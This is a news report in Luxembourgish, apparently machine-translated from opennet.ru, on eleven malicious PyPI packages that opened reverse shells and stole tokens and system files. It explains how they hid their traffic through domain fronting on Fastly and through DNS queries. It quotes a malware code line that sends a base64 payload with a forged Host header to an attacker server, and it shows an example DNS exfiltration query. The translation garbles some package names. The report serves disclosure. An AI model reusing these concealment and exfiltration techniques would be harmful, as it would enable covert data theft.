Am PyPI (Python Package Index) Verzeechnes goufen 11 Packagen identifizéiert, déi béiswëlleg Code enthalen. Ier d'Problemer identifizéiert goufen, goufen d'Packagen am Ganzen ongeféier 38 Tausend Mol erofgelueden. Déi detektéiert béiswëlleg Packagen si bemierkenswäert fir hir Benotzung vu raffinéierte Methoden fir Kommunikatiounskanäle mat den Ugräifer Serveren ze verstoppen.
- importantpackage (6305 Downloads), wichteg-Package (12897) - huet eng Verbindung mat engem externen Server ënner dem Deckmantel vun der Verbindung mat pypi.python.org etabléiert fir Shell Zougang zum System ze bidden (Reverse Shell) a benotzt den Trevorc2 Programm fir de System ze verstoppen Kommunikatioun Kanal.
- pptest (10001), ipboards (946) - benotzt DNS als Kommunikatiounskanal fir Informatioun iwwer de System ze vermëttelen (am éischte Paket den Hostnumm, den Aarbechtsverzeechnes, intern an extern IP, an der zweeter - de Benotzernumm an de Hostnumm) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - identifizéiert den Discord Service Token am System an huet en un en externen Host geschéckt.
- trrfab (287) - den Identifizéierer, den Hostnumm an den Inhalt vun /etc/passwd, /etc/hosts, /home un den externen Host geschéckt.
- 10Cent10 (490) - etabléiert eng ëmgedréint Shell Verbindung mat engem externen Host.
- yandex-yt (4183) - weist e Message iwwer de System kompromittéiert an op eng Säit ëmgeleet mat zousätzlech Informatioun iwwer weider Aktiounen, déi duerch nda.ya.ru (api.ya.cc) erausginn sinn.
Besonnesch Notiz ass d'Method fir Zougang zu externen Hosten, déi am wichtege Package a wichtege Pakete benotzt ginn, déi de Fastly Inhalt Liwwernetz benotzt am PyPI Verzeichnis benotzt fir hir Aktivitéit ze verstoppen. Tatsächlech goufen Ufroe op den pypi.python.org Server geschéckt (inklusive spezifizéieren den Numm python.org am SNI an der HTTPS Ufro), awer den HTTP "Host" Header enthält den Numm vum Server deen vun den Ugräifer kontrolléiert gouf (sec. forward.io. global.prod.fastly.net). D'Inhaltsliwwerungsnetz huet eng ähnlech Ufro un den attackéierte Server geschéckt, andeems d'Parameteren vun der TLS Verbindung op pypi.python.org beim Iwwerdroen vun Daten benotzt.
D'PyPI Infrastruktur gëtt ugedriwwen vum Fastly Inhalt Liwwerungsnetz, deen den Varnish transparente Proxy benotzt fir typesch Ufroen ze cache, an och TLS Zertifika Veraarbechtung um CDN Niveau benotzt, anstatt um Enn Server, fir HTTPS Ufroen duerch e Proxy weiderzebréngen. Onofhängeg vum Zilhost, Ufroe ginn un de Proxy geschéckt, deen de gewënschten Host mam HTTP "Host" Header bestëmmt, an d'Host Domain Nimm sinn un d'CDN Lastbalancer IP Adressen gebonnen, déi typesch fir all Fastly Clienten sinn.
Den Server vun den Ugräifer registréiert och mat CDN Fastly, wat jidderee gratis Pläng ubitt a souguer anonym Registréierung erlaabt. Et ass bemierkenswäert datt d'Ufro un d'Affer ze schécken wann Dir eng "Reverse Shell" erstellt, e Schema gëtt och benotzt, awer vun der Säit vum Host vum Ugräifer initiéiert. Vun dobausse gesäit d'Interaktioun mam Server vun den Ugräifer aus wéi eng legitim Sessioun mam PyPI Verzeichnis, verschlësselt mat engem PyPI TLS Zertifika. Eng ähnlech Technik, bekannt als "Domain Fronting", gouf virdru aktiv benotzt fir den Hostnumm ze verstoppen wann d'Blockéierung ëmgeet, andeems d'Fäegkeet an e puer CDN Netzwierker zur Verfügung gestallt gëtt fir Zougang zu HTTPS ze benotzen andeems e fiktiven Host am SNI uginn an tatsächlech den Numm vum ugefrote Host am HTTP Host Header an enger TLS Sessioun.
Fir béiswëlleg Aktivitéit ze verstoppen, gouf den TrevorC2 Package zousätzlech benotzt fir Interaktioun mam Server ähnlech wéi normal Webnavigatioun ze maachen, zum Beispill, béiswëlleg Ufroe goufen ënner dem Deckmantel vum Download vum Bild geschéckt "https://pypi.python.org/images/ guid=" mat Informatiounskodéierung am Guide Parameter. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
D'pptest an ipboards Packagen hunn eng aner Approche benotzt fir Netzwierkaktivitéit ze verstoppen, baséiert op Kodéierung vun nëtzlechen Informatioun an Ufroen op den DNS Server. D'Malware iwwerdréit Informatioun andeems Dir DNS-Ufroe wéi "nu4timjagq4fimbuhe.example.com" ausféiert, an där d'Donnéeën, déi op de Kontrollserver iwwerdroe ginn, kodéiert ginn mat dem Base64 Format am Subdomain Numm. Den Ugräifer kritt dës Messagen andeems Dir den DNS-Server fir d'example.com Domain kontrolléiert.
Source: opennet.ru